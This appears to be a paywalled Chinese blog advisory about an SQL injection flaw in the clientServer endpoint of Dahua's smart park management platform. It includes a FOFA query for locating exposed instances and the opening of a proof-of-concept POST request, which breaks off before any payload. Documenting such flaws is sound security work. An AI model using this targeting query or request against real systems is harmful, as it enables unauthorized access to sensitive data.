超级会员免费看
大华智慧园区综合管理平台存在SQL注入漏洞,因clientServer接口未过滤用户输入,导致敏感信息可能被远程未授权攻击者获取,影响系统安全性。建议限制访问源地址并升级至安全版本。
产品简介
“大华智慧园区综合管理平台”是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。
漏洞概述
由于大华智慧园区综合管理平台clientServer接口处未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限。
复现环境
FOFA:app=”dahua-智慧园区综合管理平台”
漏洞复现
Poc
POST /portal/services/clientServer HTTP/1.1
Host: your-ip
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: text/xml;cha
订阅专栏 解锁全文
扫一扫
854
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
